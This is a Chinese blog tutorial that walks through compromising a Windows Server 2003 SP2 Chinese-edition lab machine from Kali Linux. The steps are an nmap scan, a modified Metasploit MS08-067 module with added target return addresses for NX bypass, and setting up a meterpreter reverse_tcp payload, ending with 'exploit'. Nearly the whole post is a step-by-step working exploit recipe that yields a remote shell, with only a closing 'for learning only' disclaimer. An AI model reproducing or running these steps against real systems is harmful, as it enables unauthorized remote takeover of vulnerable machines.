kail入侵win2003 sp2 中文版系统

日期: 栏目:文章分享 浏览:563 评论:0

教程开始:

攻击机:kail —— IP:192.168.74.132

目标靶机:win2003 sp2 中文版系统—— IP:192.168.74.128

 

一、扫描漏洞

1. 在kail中运行 namp 192.168.74.128 ,查看目标主机开放的端口号并选取要攻击的端口号

kail入侵win2003 sp2 中文版系统-第1张图片-Ceacer网络

 2. 由于是中文版系统所以需要添加模块

(1)进入目录: cd  /usr/share/metasploit-framework/modules/exploits/windows/smb

(2)备份文件: cp  ms08_067_netapi.rb ms08_067_netapi_ser2003_zh.rb

(3)列出文件: ls

kail入侵win2003 sp2 中文版系统-第2张图片-Ceacer网络

 

 (4)编辑文件: vim  ms08_067_netapi_ser2003_zh.rb

 (5)添加以下内容:

['Windows 2003 SP2 Chinese (NX)',

           {

             'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)

             'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

             'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)

             'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL

             'Scratch'   => 0x00020408,

           }

          ],

kail入侵win2003 sp2 中文版系统-第3张图片-Ceacer网络

 3. 进入攻击阶段

(1)进入msfconsole模式

kail入侵win2003 sp2 中文版系统-第4张图片-Ceacer网络

 (2)查找漏洞: search ms08_067   (或者使用show exploits 列出所有漏洞)

 (3)使用漏洞: use exploit/windows/smb/ms08_067_netapi_ser2003_zh

 (4)查看详情: info   (记住下图所圈的id号,后边会用到,具体的id号是多少根据自己的实际情况而定)

kail入侵win2003 sp2 中文版系统-第5张图片-Ceacer网络

kail入侵win2003 sp2 中文版系统-第6张图片-Ceacer网络

 (5)设置监听主机: set LHOST 192.168.74.132   (kail的IP)

 (6)设置目标主机: set RHOST 192.168.74.128   (靶机的IP)

 (7)设置攻击方式: set payload windows/meterpreter/reverse_tcp

kail入侵win2003 sp2 中文版系统-第7张图片-Ceacer网络

 (8)查看详情: show options

kail入侵win2003 sp2 中文版系统-第8张图片-Ceacer网络

 (9)设置目标id: set  target  12

 (10)查看详情:  show  options

kail入侵win2003 sp2 中文版系统-第9张图片-Ceacer网络

 kail入侵win2003 sp2 中文版系统-第10张图片-Ceacer网络

 (11)攻击: exploit

kail入侵win2003 sp2 中文版系统-第11张图片-Ceacer网络

 kail入侵win2003 sp2 中文版系统-第12张图片-Ceacer网络

同理,08、win7也可以用此类方法,此方法仅用于学习,切勿用于违法行为!!


评论留言

我要留言

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。发布前请先查看评论规则:点我查看